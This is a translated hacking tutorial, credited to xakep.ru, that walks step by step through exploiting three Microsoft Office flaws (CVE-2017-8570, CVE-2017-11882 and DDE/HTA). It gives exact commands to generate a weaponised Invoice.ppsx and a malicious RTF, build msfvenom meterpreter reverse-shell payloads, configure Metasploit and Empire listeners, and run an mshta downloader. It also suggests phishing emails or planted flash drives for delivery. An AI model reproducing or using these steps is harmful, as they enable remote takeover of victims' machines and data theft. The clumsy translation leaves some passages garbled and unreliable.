How to use the most dangerous bugs in Microsoft Office lately

How to use the most dangerous bugs in Microsoft Office lately

Correct processing of OLE responses (CVE-2017-8570). When an infected document is opened, the app makes a request to a remote server to retrieve the file embedded in that document. The server returns a specially generated response. It contains a malicious file HTA, from which arbitrary code is executed on the target system after downloading.

This problem became known in April 2017, and in August another important episode took place: Cisco analyst department told us about a new vulnerability related to this, CVE-2017-0199. Whereas earlier Rich Text File (RTF) documents were used for attacks, the new threat was related to PowerPoint (.ppsx) files.



 

Principle of work

.
The attack using this vulnerability develops according to a very simple scenario: the user receives an email with a malicious Word document and tricks the victim to open the attachments. Inside the document there is an OLE2link object hidden. If the victim uses Protected View, the exploit will not work, but if this mode is disabled, an HTTP request will be sent to the attacker’s server and will upload an HTA file disguised as RTF.

Download HTA file disguised as RTF

.



Listing dump in disassembler demonstrating “dangerous stuffing”

When the HTA file is uploaded, it will be executed automatically. This way the exploit is triggered and the original Word document is closed. Instead, a fake document will open, designed to put the victim’s vigilance to sleep.

 

Exploitation

.
The first thing we do is go to GitHub and watch the exploits. I will use variant of user tezukanice. In Office8570 we create the folder template and move the downloaded file template.ppsx to it.

Prepare step

.
Now run the script to generate a PPSX file with payload:

$ python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.0.104/logo.doc.

Specify the victim IP (in my case it is 192.168.0.104) and we see that the file Invoice.ppsx has appeared.

Generate payload file

Next, using Metasploit, we create a payload as a shell.exe file in the tmp directory:

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f exe > /tmp/shell.exe

The matter is done, now we start the listener, who will check the port:

$ msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.104; set LPORT 4444; run"

To make everything work, we just have to do one more action – to prescribe a command to run the local server on port 80.

$ python cve-2017-8570_toolkit.py -M exp -e http://192.168.0.104/shell.exe -l /tmp/shell.exe

And the final step is to transfer the infected PowerPoint presentation file (Invoice.ppsx) to the victim machine. How is it another question. It is possible to prepare a phishing email, to plant a flash drive or something like that. When the victim opens the file on his machine, the exploit will work and we will get a wind-schell.

You can watch the bug demonstration on video.

.

Hacker Honey

Buffer overflow in formula editor (CVE-2017-11882)

.
This dangerous bug, which allows to execute code without interacting with the user, existed for 17 years.

The researchers explain that the problem has to do with Microsoft Equation Editor (EQNEDT32.EXE). It would seem to be a harmless formula editor! But this file was last compiled on November 9, 2000. Of course, it does not meet modern security standards. In Office 2007 this component was replaced by a new version, but the old one was not removed – people need to open old documents, right?

EQNEDT32.EXE analysts found two bug files in EQNEDT32.EXE related to data integrity impairment in memory (buffer overflow). Introduction of malicious OLE objects exploiting these vulnerabilities into the document allows arbitrary code execution on the machine, including downloading any file from a remote server and executing it.

 

Exploitation

.
Again ready to exploit from GitHub, thanks to the guy with the nickname Ridter for it. We clone the repository and make the scripts executable:

$ git clone https://github.com/Ridter/CVE-2017-11882

$ cd CVE-2017-11882

$ chmod +x Command109b_CVE-2017-11882.py

$ chmod +x Command43b_CVE-2017-11882.py

Now we will need another hacker framework – Empire. With this framework we will create listeners. In case you are not familiar with Empire, I will explain that the “listener” is represented by our IP and the port where we will meet the connection from the victim machine.

Download Empire:

$ git clone https://github.com/adaptivethreat/Empire.git

Now you can start and look at the available commands by typing help.

We write the following commands to create listeners:

listeners

uselistener http

Set the initial settings:

  • set <Name http> – specify name of HTTP listener;
  • set <Host ip> – write an ip directory where to go
  • set <Port> – write on which port to knock;
  • execute.

Once everything is done, we return to the main menu with the command main.

Return to the main menu

.
Create the HTA load with the following commands:

    • usestager windows/hta – align the module we need;
    • set Listener http – activate HTTP listener;

.

  • set OutFile /tmp/hack1.hta – specify the path to save the file and give it a non-professional name;
  • execute – complete the generation and exit the menu.
Create load

.
Almost all done! Now we need to go to /tmp and get our hackl.hta battle file out of there. This is what we will run on the victim machine.

INFO:

.
The HTA (HTML Application) format allows opening HTML documents without a browser. Launches mshta.exe applications that use the RunHTMLApplication function (undocumented). This executable in Windows has the .hta extension by default.

Since not every user would dare run an HTA on their wheelbarrow, we will wrap it in a Word document. The documents are harmless, everyone knows that!

We go back to the console and write the following:

$ python Command109b_CVE-2017-11882.py -c "mshta <link>". -o Example.rtf

Here mshta <link> is the URL of the hack1.hta file that lies on our server.

Now the file needs to be delivered to the target machine. As soon as it is opened, the connection that we access PowerShell will rise.

Connect to the victim machine

.

Exploitation of DDE (CVE-2017-11826)

.
On October 10, 2018, researchers from the Chinese company Qihoo 360 reported a zero-day vulnerability in Microsoft Office, which has already been actively exploited by attackers: they organized a campaign aimed at businesses. The attack was different in that it did not use OLE objects or macros.

 

Demonstration

.
From the victim’s perspective, the attack looks like this. An email with an attached document comes in, we open it and see the following message.

If you press the Yes button, another message will appear.

And one more thing.

Below is a tree view of the process. This can be observed when the exploit is working correctly.

Download and execute malware from Word

.

Principle of work

The technique of this attack is based on a rather old Microsoft Dynamic Data Exchange (DDE) feature, which allows one Office application to download data from other applications. For example, a table in a Word file can be automatically updated every time the file is launched and the data will be pulled from the Excel file.

Usually, when a DDE is triggered, an application shows the user two warnings, which can be seen in the illustration below. And experts note that the second warning, which informs about an error, may not always be displayed.

The main problem here is that users who often work with DDE do not pay any attention to these messages. Such warnings have already become something so familiar that they are closed without looking.

The researchers, including employees of the companies SensePost and Cisco Talos, more than once noted that DDE is often exploited by hackers, and tried to convey the problem to the specialists of Microsoft, but those long refused to recognize this vulnerability, until finally released a patch ADV170021, closing the hole.

The ability to exploit DDE to attack really is not a vulnerability in the usual sense of the word. After all, Office honestly warns the user about the potential danger. The situation is almost similar to the problems with macros and OLE.

Meanwhile, DDE attacks are practiced by serious hacker groups, in particular FIN7, known for large-scale attacks on financial organizations. And the patch prevents this, but it is still far from being installed everywhere.

 

How to enable DDE back

.
In fact, the patch only makes minor registry changes and deactivates DDE by default. To enable this feature again, you just need to change the value of one key:

\HKEY_CURRENT_USER\Software\Microsoft\Office\version\Word\Security AllowDDE(DWORD)

The value of this dword may be one of the following:

    • AllowDDE(DWORD) = 0 – disables DDE. Once the update is installed, this is the default;

AllowDDE> - disables DDE.

    • AllowDDE(DWORD) = 1 – allows DDE requests to programs already running but does not allow new programs to run;

.

  • AllowDDE(DWORD) = 2 – allows any requests.

Experience

Let’s see how to get an active session on a remote host (Windows 8.1, Windows 7, Windows Server 2008). For this we use a script in Python which generates an RTF file. Everything you need is included in the Metasploit Framework.

The corresponding module creates malicious RTF – if you open it in vulnerable versions of Word, the code will be executed. Vulnerability is that OLE object can make HTTP(S) request and execute HTA code in response.

Let’s get started.

> use exploit/windows/fileformat/office_word_hta.

> set srvhost 192.168.0.106

> set payload windows/meterpreter/reverse_tcp

> set filename order.doc

> set lhost 192.168.0.106

> exploit

The link highlighted in red must be delivered to the target host.

If you navigate through it and run the downloaded file, the active session will open.

Type sysinfo to make sure it is a victory.

Conclusions

We have examined three serious vulnerabilities that are fully exploited by abusers. All three bugs are already to some extent covered by patches and have some limitations, but old versions of Office are so common that vulnerabilities will remain relevant for a long time.

Remember: updates are not a whim of Microsoft at all, patches are one of the mandatory security conditions. But it is not the only one. Months sometimes pass between the detection of a problem and its fixing, so even if you correctly update the document, there is always a chance to come across a document with a surprise.

 

Taken from xakep.ru.



WARNING! All links in the articles may lead to malicious sites or contain viruses. Follow them at your own risk. Those who purposely visit the article know what they are doing. Do not click on everything thoughtlessly.


2 Views

0 0 vote
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments


Do NOT follow this link or you will be banned from the site!
0
Would love your thoughts, please comment.x
()
x

Spelling error report

The following text will be sent to our editors: